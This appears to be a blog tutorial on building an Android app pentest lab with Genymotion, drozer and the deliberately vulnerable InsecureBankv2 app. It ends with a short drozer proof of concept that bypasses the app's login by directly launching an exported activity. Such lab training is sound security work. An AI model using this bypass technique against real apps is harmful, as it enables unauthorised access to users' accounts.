How to Setup a Basic Android App Pentest Lab

 


This post is designed to get you started with a basic Android app pentesting lab and show a basic example of using drozer against a vulnerable test app.


Test environment

  • Ubuntu 20.04
  • VirtualBox 6.1.10
  • Genymotion 3.1.2 x64
  • Android Studio 4.1.1
  • drozer 2.4.4
  • InsecureBankv2

 

Instructions

1. Download Android Studio
2. Decompress and then run with bin/studio.sh
3. Download and install VirtualBox
4. Download Genymotion Desktop for Linux
5. Run these Ubuntu commands:

chmod u+x genymotion-3.1.2-linux_x64.bin
./genymotion-3.1.2-linux_x64.bin
 

6. Choose personal use during Genymotion setup if you are using the free license

7. Point Genymotion to Android Studio's SDK tools by clicking the word Genymotion and then Settings>ADB>Use custom Android SDK tools>/home/<username>/Android/Sdk

8. Use the + button to create a VM (Nexus 4.4, for instance) in Genymotion and then start it. The VM will automatically populate/start in VirtualBox.


9. Install the drozer console in Ubuntu using these commands:

  • wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
  • sudo apt-get --assume-yes install python-pip
  • pip2 install wheel
  • pip2 install pyyaml
  • pip2 install pyhamcrest
  • pip2 install protobuf
  • pip2 install pyopenssl
  • pip2 install twisted
  • pip2 install service_identity
  • pip2 install drozer-2.4.4-py2-none-any.whl


10. Download the Genymotion_ARM_Translation and drozer agent APKs using Ubuntu and then simply drag those zipped APKs from Ubuntu to the Android screen to install. This will allow the Android VM to communicate with the drozer console.

11. Download InsecureBankv2 and run this Ubuntu command to push the vulnerable test app to the Android VM (can't click and drag this one):

adb install InsecureBankv2.apk

13. From Android, open the drozer agent app and toggle the switch to on.



14. Run these commands from Ubuntu to connect to the Android VM for testing:

adb forward tcp:31415 tcp:31415
drozer console connect


 

15. Open the InsecureBankv2 app on the Android and observe the login screen.

 

 

16. From the drozer console on Ubuntu, perform a login bypass attack for a quick PoC which exploits open/null permissions (type help to learn syntax):

run app.package.attacksurface com.android.insecurebankv2

run app.activity.info -a com.android.insecurebankv2

run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.PostLogin

 

17. Note on the Android InsecureBankv2 screen that login has been bypassed and you can choose Transfer.



18. Google for more InsecureBankv2 sploits and try stuff!



References

I am grateful to have learned from some of the sources below in order to create this post. Others of these links I'm including because they go into more depth on relevant subjects.

https://bsderek.home.blog/2020/01/21/essential-tools-for-mobile-security-testing/

https://github.com/FSecureLABS/drozer/issues/357

https://sarpex.com/2016/10/connect-genymotion-emulator-remotely/

https://manifestsecurity.com/appie/

https://blog.securelayer7.net/setting-up-an-android-pentesting-environment/

https://resources.infosecinstitute.com/topic/android-application-hacking-with-insecure-bank-part-4/
 

https://medium.com/bugbountywriteup/android-insecurebankv2-walkthrough-part-1-9e0788ba5552

https://medium.com/bugbountywriteup/android-insecurebankv2-walkthrough-part-2-429b4ab4a60f

https://medium.com/bugbountywriteup/android-insecurebankv2-walkthrough-part-3-2b3e5843fe91

https://github.com/AndroidTamer/AndroidTamer



Comments

Popular Posts